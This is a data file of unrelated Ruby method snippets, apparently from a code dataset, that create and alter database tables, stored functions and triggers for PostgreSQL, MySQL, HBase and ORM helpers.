"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def trigger\n trigger_function = \"insert_#{master_table}\"\n unless @column == 'page'\n column = \"#{@column},\"\n column_function = \"coalesce(quote_literal(NEW.#{@column}), 'NULL') || ',' ||\"\n end\n \n cmd = <<-COMMAND\n CREATE OR REPLACE FUNCTION #{trigger_function}() \n RETURNS TRIGGER AS $$ \n DECLARE\n ins_sql TEXT; \n BEGIN\n ins_sql := 'INSERT INTO daily_#{@column}_views_' || (NEW.writer_id % #{@partition_size}) ||\n '(date,article_id,#{column}count,writer_id,partition_id) \n VALUES ' ||\n '('|| quote_literal(NEW.date) || ',' || NEW.article_id ||',' ||\n \t#{column_function} \n \t\t\tNEW.count || ',' || \n \t\t\tNEW.writer_id || ',' || (NEW.writer_id % #{@partition_size}) ||')'\n ; \n EXECUTE ins_sql;\n RETURN NULL;\n END; \n $$\n LANGUAGE plpgsql;\n \n CREATE TRIGGER #{trigger_function}_trigger\n BEFORE INSERT ON #{master_table}\n FOR EACH ROW EXECUTE PROCEDURE #{trigger_function}();\n COMMAND\n @conns.each{|conn| conn.exec(cmd)}\n end",
"def triggerStatements _args\n \"triggerStatements _args;\" \n end",
"def change_table(*args, &block)\n apply_translatable_option!(:change_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end",
"def create_table(table, **kwargs, &block)\n current_instructions << Instructions::CreateTable.new(\n **kwargs,\n table: table,\n columns_block: block,\n )\n end",
"def table(name, args = {}, &block)\n args[:base_columns] ||= columns\n table = Table.new(args, &block)\n tables << table\n singleton_class.send(:define_method, name) { return table }\n end",
"def create_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:create_table, self, *args, &block)\n end",
"def tracker_replace_trigger_function(table_name)\n create_trigger_function(TRACKER_FUNCTION_NAME, replace: true) do\n <<~SQL\n UPDATE projects SET has_external_issue_tracker = (\n EXISTS\n (\n SELECT 1\n FROM #{table_name}\n WHERE project_id = COALESCE(NEW.project_id, OLD.project_id)\n AND active = TRUE\n AND category = 'issue_tracker'\n )\n )\n WHERE projects.id = COALESCE(NEW.project_id, OLD.project_id);\n RETURN NULL;\n SQL\n end\n end",
"def report_new_table(table_name, opts = {})\n return if @tables.key?(table_name) # check if already reported before\n puts \">>>> FOUND TABLE: #{table_name}\"\n t = @tables[table_name] = OmlSqlRow.new(table_name, @db_file, self, opts)\n @on_new_stream_procs.each_value do |proc|\n proc.call(t)\n end\n end",
"def trigger(owner, event, *args); end",
"def apply_changes\n changes.each do |method, args|\n connection.send(method, new_table, *args)\n end\n end",
"def switch_trigger_mode(database, table, exclude_rr_activity)\n options = session.configuration.options\n if session.send(database).replication_trigger_exists? \"#{options[:rep_prefix]}_#{table}\", table\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => exclude_rr_activity,\n }\n session.send(database).create_or_replace_replication_trigger_function(params)\n end\n end",
"def create_table(table, options={})\n return send_message(SkyDB::Message::CreateTable.new(table, options))\n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create_function(name, definition, opts=OPTS)\n self << create_function_sql(name, definition, opts)\n end",
"def create_or_replace_replication_trigger_function(params)\n execute(<<-end_sql)\n DROP PROCEDURE IF EXISTS `#{params[:trigger_name]}`;\n end_sql\n \n activity_check = \"\"\n if params[:exclude_rr_activity] then\n activity_check = <<-end_sql\n DECLARE active INT;\n SELECT count(*) INTO active FROM #{params[:activity_table]};\n IF active <> 0 THEN\n LEAVE p;\n END IF;\n end_sql\n end\n\n execute(<<-end_sql)\n CREATE PROCEDURE `#{params[:trigger_name]}`(change_key varchar(2000), change_new_key varchar(2000), change_type varchar(1))\n p: BEGIN\n #{activity_check}\n INSERT INTO #{params[:log_table]}(change_table, change_key, change_new_key, change_type, change_time)\n VALUES('#{params[:table]}', change_key, change_new_key, change_type, now());\n END;\n end_sql\n \n end",
"def trigger(name, *args)\n Events.use(name, *args)\n end",
"def create_events(db: EventSourcery::Postgres.config.event_store_database,\n table_name: EventSourcery::Postgres.config.events_table_name)\n db.run 'CREATE EXTENSION IF NOT EXISTS \"uuid-ossp\"'\n db.create_table(table_name) do\n primary_key :id, type: :Bignum\n column :uuid, :uuid, null: false, default: Sequel.lit('uuid_generate_v4()')\n column :aggregate_id, :uuid, null: false\n column :type, :varchar, null: false, size: 255\n column :body, :json, null: false\n column :version, :bigint, null: false\n column :correlation_id, :uuid\n column :causation_id, :uuid\n column :created_at, :'timestamp without time zone', null: false, default: Sequel.lit(\"(now() at time zone 'utc')\")\n index [:aggregate_id, :version], unique: true\n index :uuid, unique: true\n index :type\n index :correlation_id\n index :causation_id\n index :created_at\n end\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def event(event, opts={}, &block)\r\n tt = read_inheritable_attribute(:transition_table)\r\n \r\n et = read_inheritable_attribute(:event_table)\r\n e = et[event.to_sym] = SupportingClasses::Event.new(event, opts, tt, &block)\r\n define_method(\"#{event.to_s}!\") { e.fire(self) }\r\n end",
"def alter(table_name_str, wait = true, *args)\n # Table name should be a string\n raise(ArgumentError, 'Table name must be of type String') unless\n table_name_str.is_a?(String)\n\n # Table should exist\n raise(ArgumentError, \"Can't find a table: #{table_name_str}\") unless exists?(table_name_str)\n\n # There should be at least one argument\n raise(ArgumentError, 'There should be at least one argument but the table name') if args.empty?\n\n table_name = TableName.valueOf(table_name_str)\n\n # Get table descriptor\n tdb = TableDescriptorBuilder.newBuilder(@admin.getDescriptor(table_name))\n hasTableUpdate = false\n\n # Process all args\n args.each do |arg|\n # Normalize args to support column name only alter specs\n arg = { NAME => arg } if arg.is_a?(String)\n\n # Normalize args to support shortcut delete syntax\n arg = { METHOD => 'delete', NAME => arg['delete'] } if arg['delete']\n\n # There are 3 possible options.\n # 1) Column family spec. Distinguished by having a NAME and no METHOD.\n method = arg.delete(METHOD)\n if method.nil? && arg.key?(NAME)\n descriptor = cfd(arg, tdb)\n column_name = descriptor.getNameAsString\n\n # If column already exist, then try to alter it. Create otherwise.\n if tdb.build.hasColumnFamily(column_name.to_java_bytes)\n tdb.modifyColumnFamily(descriptor)\n else\n tdb.setColumnFamily(descriptor)\n end\n hasTableUpdate = true\n next\n end\n\n # 2) Method other than table_att, with some args.\n name = arg.delete(NAME)\n if !method.nil? && method != 'table_att'\n # Delete column family\n if method == 'delete'\n raise(ArgumentError, 'NAME parameter missing for delete method') unless name\n tdb.removeColumnFamily(name.to_java_bytes)\n hasTableUpdate = true\n # Unset table attributes\n elsif method == 'table_att_unset'\n raise(ArgumentError, 'NAME parameter missing for table_att_unset method') unless name\n if name.is_a?(Array)\n name.each do |key|\n if tdb.build.getValue(key).nil?\n raise ArgumentError, \"Could not find attribute: #{key}\"\n end\n tdb.removeValue(key)\n end\n else\n if tdb.build.getValue(name).nil?\n raise ArgumentError, \"Could not find attribute: #{name}\"\n end\n tdb.removeValue(name)\n end\n hasTableUpdate = true\n elsif method == 'table_remove_coprocessor'\n classname = arg.delete(CLASSNAME)\n raise(ArgumentError, 'CLASSNAME parameter missing for table_remove_coprocessor method') unless classname\n if classname.is_a?(Array)\n classname.each do |key|\n tdb.removeCoprocessor(key)\n end\n else\n tdb.removeCoprocessor(classname)\n end\n hasTableUpdate = true\n # Unset table configuration\n elsif method == 'table_conf_unset'\n raise(ArgumentError, 'NAME parameter missing for table_conf_unset method') unless name\n if name.is_a?(Array)\n name.each do |key|\n if tdb.build.getValue(key).nil?\n raise ArgumentError, \"Could not find configuration: #{key}\"\n end\n tdb.removeValue(key)\n end\n else\n if tdb.build.getValue(name).nil?\n raise ArgumentError, \"Could not find configuration: #{name}\"\n end\n tdb.removeValue(name)\n end\n hasTableUpdate = true\n # Unknown method\n else\n raise ArgumentError, \"Unknown method: #{method}\"\n end\n\n arg.each_key do |unknown_key|\n puts(format('Unknown argument ignored: %s', unknown_key))\n end\n\n next\n end\n\n # 3) Some args for the table, optionally with METHOD => table_att (deprecated)\n update_tdb_from_arg(tdb, arg)\n\n # set a coprocessor attribute\n valid_coproc_keys = []\n next unless arg.is_a?(Hash)\n arg.each do |key, value|\n k = String.new(key) # prepare to strip\n k.strip!\n\n # Uses insensitive matching so we can accept lowercase 'coprocessor' for compatibility\n next unless k =~ /#{COPROCESSOR}/i\n if value.is_a? String\n # Specifying a coprocessor by this \"spec string\" is here for backwards compatibility\n v = String.new value\n v.strip!\n cp = coprocessor_descriptor_from_spec_str v\n elsif value.is_a? Hash\n cp = coprocessor_descriptor_from_hash value\n else\n raise ArgumentError.new 'coprocessor must be provided as a String or Hash'\n end\n tdb.setCoprocessor cp\n valid_coproc_keys << key\n end\n\n valid_coproc_keys.each do |key|\n arg.delete(key)\n end\n\n hasTableUpdate = true\n\n arg.each_key do |unknown_key|\n puts(format('Unknown argument ignored: %s', unknown_key))\n end\n\n next\n end\n\n # Bulk apply all table modifications.\n if hasTableUpdate\n future = @admin.modifyTableAsync(tdb.build)\n\n if wait == true\n puts 'Updating all regions with the new schema...'\n future.get\n end\n end\n end",
"def change_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:change_table, self, *args, &block)\n end",
"def create_event options\n row=table.add calculate_value(expression,options)\n super options.merge row: row\n end",
"def add_trigger_and_function(filename, trigger_tables, drop_function=false)\n build_query filename, 'triggers' do |seed, queries|\n queries[0] << %Q!BEGIN;\n CREATE OR REPLACE FUNCTION #{seed['name']}() RETURNS #{seed['function']['return']} AS $$\n BEGIN\n #{seed['function']['sql']}\n END;\n $$ LANGUAGE plpgsql;\n #{Array(trigger_tables).map do |table|\n \"CREATE TRIGGER #{seed['name']} #{seed['trigger']['event'].gsub('<TRIGGERTABLE>', table)} #{seed['trigger']['execute']} #{seed['name']}();\"\n end.join(\"\\n\")}\n COMMIT;!\n queries[1] << Array(trigger_tables).map { |table| \"DROP TRIGGER IF EXISTS #{seed['name']} ON #{table};\\n\" } << (drop_function ? \"DROP FUNCTION IF EXISTS #{seed['name']};\" : '')\n end\n end",
"def create_table(table_name, *args, **kwargs, &block)\n helper_context = self\n\n super do |t|\n t.define_singleton_method(:text) do |column_name, **kwargs|\n limit = kwargs.delete(:limit)\n\n super(column_name, **kwargs)\n\n if limit\n # rubocop:disable GitlabSecurity/PublicSend\n name = helper_context.send(:text_limit_name, table_name, column_name)\n # rubocop:enable GitlabSecurity/PublicSend\n\n column_name = helper_context.quote_column_name(column_name)\n definition = \"char_length(#{column_name}) <= #{limit}\"\n\n t.check_constraint(definition, name: name)\n end\n end\n\n t.instance_eval(&block) unless block.nil?\n end\n end",
"def triggers\n res = select_all <<-SQL\n SELECT n.nspname as schema,\n c.relname as table,\n t.tgname as trigger_name,\n t.tgenabled as enable_mode,\n t.tgdeferrable as is_deferrable,\n t.tginitdeferred as is_initially_deferrable,\n pg_catalog.pg_get_triggerdef(t.oid, true) as trigger_definition\n FROM pg_catalog.pg_trigger t\n INNER JOIN pg_catalog.pg_class c ON c.oid = t.tgrelid\n INNER JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v')\n AND NOT t.tgisinternal\n ORDER BY 1, 2, 3;\n SQL\n\n res.inject([]) do |buffer, row|\n schema = row['schema']\n table = row['table']\n trigger_name = row['trigger_name']\n is_deferrable = row['is_deferrable']\n is_initially_deferred = row['is_initially_deferred']\n\n trigger_definition = row['trigger_definition']\n\n is_constraint = is_constraint?(trigger_definition)\n proc_name = parse_proc_name(trigger_definition)\n event = parse_event(trigger_definition, trigger_name)\n condition = parse_condition(trigger_definition)\n\n for_every = !!(trigger_definition =~ /FOR[\\s]EACH[\\s]ROW/) ? :row : :statement\n\n if proc_name && event\n buffer << ::PgSaurus::ConnectionAdapters::TriggerDefinition.new(\n trigger_name,\n proc_name,\n is_constraint,\n event,\n for_every,\n is_deferrable,\n is_initially_deferred,\n condition,\n table,\n schema\n )\n end\n buffer\n end\n end",
"def TableCreateClicked\n unless getDBConn.conn\n msgbox(_(\"Warning\"), _(\"Currently there is no active database.\"), \"warning\")\n return null\n end\n\n tablename = knj_input(_(\"Name\"), _(\"Please enter the table name:\"))\n return null if tablename === false\n\n unless preg_match(\"/^[a-zA-Z][a-zA-Z0-9_]+/\", tablename, match)\n msgbox(_(\"Warning\"), _(\"The name you chooce is not a valid table-name.\"), \"warning\")\n return null\n end\n\n columns_count = knj_input(_(\"Columns\"), _(\"Please enter the number of columns you want:\"))\n return null if columns_count === false\n\n require_once(\"gui/win_table_create.php\")\n win_table_create = WinTableCreate.new(tablename, \"createtable\", columns_count)\n end",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n\n selector_column_definitions = column_definitions.select { |cd| selector_keys.include?(cd.name) }\n setter_column_definitions = column_definitions.select { |cd| setter_keys.include?(cd.name) }\n update_column_definitions = setter_column_definitions.select { |cd| cd.name !~ CREATED_COL_REGEX && !options[\"ignore_on_update\"].include?(cd.name) }\n\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def call(_obj, args, _ctx)\n create_table = Table.new(\n name: args[:name],\n quantity: args[:quantity],\n )\n return create_table if create_table.save\n GraphQL::ExecutionError.new(\"invalid data\")\n end",
"def trigger(*names, &block)\n if block.nil?\n names.each do |name|\n convert_method_to_trigger(name)\n end\n else\n name = names.first\n define_trigger_action(*names, &block)\n define_trigger(name)\n store_trigger(name)\n end\n end",
"def on_table(params = {})\n table = Yummi::Table::new params\n table.data = self\n return table\n end",
"def create_table_like(like_table, table, options = {}, &blk)\n options.symbolize_keys!\n code = table_schema_code(like_table)\n code.gsub!(/create_table\\s+\"#{like_table}\"/, \"create_table :#{table}\")\n if options[:replace_keys] or options[:remove_keys]\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"#add_index :#{table}\")\n else\n code.gsub!(/add_index\\s+\"#{like_table}\"/, \"add_index :#{table}\")\n end\n eval(code)\n change_table(table,&blk) if block_given?\n true\n end",
"def find_and_trigger_event(event_type, args = nil)\r\n \r\n case event_type\r\n when :before_change\r\n \r\n if respond_to?(:before_change)\r\n \r\n results = send(:before_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change\r\n \r\n if respond_to?(:after_change)\r\n \r\n results = send(:after_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_change_field\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:before_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:before_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change_field\r\n #looks in own class for :after_change_field for the field passed, requires the parameter of a Field object to be passed\r\n \r\n #SAPPHIRE UPDATE\r\n #SEARCH FOR ACTIVE MAP DEFINITION THAT INCLUDES THE CURRENT TABLE AND FIELD.\r\n #IF ANY ARE FOUND QUEUE THE PROCESS\r\n if args.table.field_order.include?(\"student_id\")\r\n \r\n if map_id = $tables.attach(\"SAPPHIRE_INTERFACE_MAP\").field_value(\r\n \"primary_id\",\r\n \"WHERE athena_table = '#{table_name }'\r\n AND athena_field = '#{args.field_name }'\r\n AND trigger_event = 'after_change_field'\"\r\n )\r\n \r\n sid = $tables.attach(args.table.table_name).field_value(\"student_id\", \"WHERE primary_id = '#{args.primary_id}'\")\r\n student = $students.get(sid)\r\n \r\n if student && student.active.is_true?\r\n \r\n queue_record = $tables.attach(\"SAPPHIRE_INTERFACE_QUEUE\").new_row\r\n queue_record.fields[\"map_id\" ].value = map_id\r\n queue_record.fields[\"athena_pid\" ].value = args.primary_id\r\n queue_record.save\r\n \r\n end\r\n \r\n end\r\n \r\n end\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:after_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:after_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_load #any table can have this event for self table\r\n \r\n continue_with_load = true\r\n \r\n this_trigger_event = \"before_load_#{table_name.downcase}\"\r\n \r\n tables_with_before_load_events = args ? args : event_array(this_trigger_event)\r\n \r\n tables_with_before_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n \r\n begin\r\n continue_with_load = this_table.send(this_trigger_event)\r\n \r\n rescue=> e\r\n #raise e #THIS SHOULD HAVE BEEN A SYSTEM NOTIFICATION - ADDING NOW BUT LEACING THIS NOTE HERE TO HELP IDENTIFY ANY ISSUES THAT MAY COME TO LIGHT WHICH WERE CONCEALED BY THIS BEFORE...\r\n $base.system_notification(\r\n subject = \"BEFORE LOAD FAILED - #{file}\",\r\n content = \"Don't just stand there and shout it; do something about it... Here's the error:\r\n #{e.message}\r\n <br>\r\n <br>\r\n #{e.backtrace}\"\r\n )\r\n \r\n end\r\n \r\n } if tables_with_before_load_events\r\n \r\n return continue_with_load\r\n \r\n when :after_load #any table can have this event for self table\r\n \r\n this_trigger_event = \"after_load_#{table_name.downcase}\"\r\n \r\n tables_with_after_load_events = args ? args.dup : event_array(this_trigger_event)\r\n \r\n db_config_record(\r\n field_name = \"phase_total\",\r\n new_value = tables_with_after_load_events.join(\",\")\r\n )\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = nil\r\n )\r\n \r\n if !args || args.include?(\"move_source_to_dest\")\r\n tables_with_after_load_events.delete(\"move_source_to_dest\")\r\n move_source_to_dest\r\n end\r\n \r\n tables_with_after_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Started #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n begin\r\n this_table.send(this_trigger_event)\r\n db_config_record = $tables.attach(\"Db_Config\").by_table_name(table_name)\r\n phase_completed = db_config_record.fields[\"phase_completed\"].value\r\n phase_completed = (phase_completed ? \"#{phase_completed},#{file}\" : file)\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = phase_completed\r\n )\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Completed #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n rescue=> e\r\n after_load_failed(message = \"#{file} - #{e.message} <br><br> #{e.backtrace}\", e)\r\n raise e\r\n end\r\n \r\n } if tables_with_after_load_events\r\n \r\n when :after_insert\r\n send(:after_insert, args) if respond_to?(:after_insert)\r\n \r\n when :after_save\r\n send(:after_save, args) if respond_to?(:after_save)\r\n \r\n when :before_insert\r\n #Looks in own class for before_insert event, requires the parameter of a Row object to be passed\r\n if respond_to?(:before_insert)\r\n send(:before_insert, args)\r\n else\r\n return true\r\n end\r\n \r\n end\r\n \r\n return true\r\n \r\n end",
"def create_event(db, name, type, date, happened)\n db.execute(\"INSERT INTO events (event_name, type_of_event, date_of_event, has_happened) VALUES (?, ?, ?, ?)\", [name, type, date, happened])\nend",
"def trigger(event_name, args, object, scope: nil)\n field = @schema.get_field(\"Subscription\", event_name)\n if !field\n raise \"No subscription matching trigger: #{event_name}\"\n end\n\n event = Subscriptions::Event.new(\n name: event_name,\n arguments: args,\n field: field,\n scope: scope,\n )\n execute_all(event, object)\n end",
"def trigger_by_scope!(event, *args, &block)\n trigger!(event, block, *args)\n end",
"def remove_trigger(table_name, proc_name, options = {})\n\n end",
"def triggerType _args\n \"triggerType _args;\" \n end",
"def create(name, table)\n Utils.model(name).new(table.hashes.first).tap do |document|\n document.save\n end\n end",
"def function(name, *args)\n SQL::Function.new(name, *args)\n end",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def trigger(*args)\n username, arguments = extract_username(args)\n trigger_id = get_id_from_arguments(arguments)\n\n get api_url(username, 'triggers', trigger_id)\n end",
"def add_trigger_action(opts)\n a = Action.new\n a.trigger_id = opts[:trigger_id]\n a.action_type = Action::Type.lookup(opts[:action_type])\n a.target_id = opts[:target_id].to_i\n a.args = opts[:args]\n\n a.save!\n a\n end",
"def trigger!\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{table_name.inspect} for selector #{selector_keys.map(&:inspect).join(', ')} and setter #{setter_keys.map(&:inspect).join(', ')}\"\n first_try = true\n connection.execute(%{\n CREATE OR REPLACE FUNCTION #{name}(#{(selector_column_definitions.map(&:to_selector_arg) + setter_column_definitions.map(&:to_setter_arg) + hstore_delete_handlers.map(&:to_arg)).join(', ')}) RETURNS VOID AS\n $$\n DECLARE\n first_try INTEGER := 1;\n BEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{update_column_definitions.map(&:to_setter).join(', ')}\n WHERE #{selector_column_definitions.map(&:to_selector).join(' AND ') };\n IF found THEN\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{setter_column_definitions.map(&:quoted_name).join(', ')}) VALUES (#{setter_column_definitions.map(&:to_setter_value).join(', ')});\n #{hstore_delete_handlers.map(&:to_pgsql).join(' ')}\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- seamusabshere 9/20/12 only retry once\n IF (first_try = 1) THEN\n first_try := 0;\n ELSE\n RETURN;\n END IF;\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\n END;\n $$\n LANGUAGE plpgsql;\n })\n rescue\n if first_try and $!.message =~ /tuple concurrently updated/\n first_try = false\n retry\n else\n raise $!\n end\n end",
"def initialize(table_name:, columns:, on_conflict:, into:)\n @columns = columns\n @into = into\n\n cols = []\n vals = []\n\n cols += columns\n vals += columns.each_with_index.map { |_, idx| \"$#{idx + 1}\" }\n\n timestamp_columns = SQL::Reflection.timestamp_columns(table_name) - columns.map(&:to_s)\n\n cols += timestamp_columns\n vals += timestamp_columns.map { \"now()\" }\n\n returning = into ? '*' : \"id\"\n\n @sql = \"INSERT INTO #{table_name} (#{cols.join(',')}) VALUES(#{vals.join(',')}) #{confict_handling(on_conflict)} RETURNING #{returning}\"\n end",
"def trigger(side, event, *args)\n self.class.hooks[:\"#{ side }_#{ event }\"].each do |method_name|\n if method(method_name).arity.zero?\n __send__(method_name)\n else\n __send__(method_name, *args)\n end\n end\n\n nil\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def function(name, *args)\n SQL::Function.new(function_name(name), *args)\n end",
"def notify_each opts={}\n _notification_builders[opts[:on] || :after_create] << Supports::Notifications::Builders::NotificationBuilder.new(opts)\n end",
"def where_table(*args, &b)\n set_parameters(args, true, &b)\n end",
"def CreateTrigger params = {}\n \n APICall(path: 'triggers.json',method: 'POST',payload: params.to_json)\n \n end",
"def create_table\n connection.create_table table_name do |t|\n t.string :record_class_name, :null => false\n t.integer :record_id, :null => false\n t.boolean :is_delete, :null => false, :default => false\n t.datetime :run_at, :null => false\n t.integer :priority, :null => false, :default => 0\n t.integer :lock, :null => true\n t.string :error, :null => true, :limit => 4000\n t.integer :attempts, :null => false, :default => 0\n end\n\n connection.add_index table_name, :record_id\n connection.add_index table_name, [:run_at, :record_class_name, :priority], :name => \"#{table_name}_run_at\"\n end",
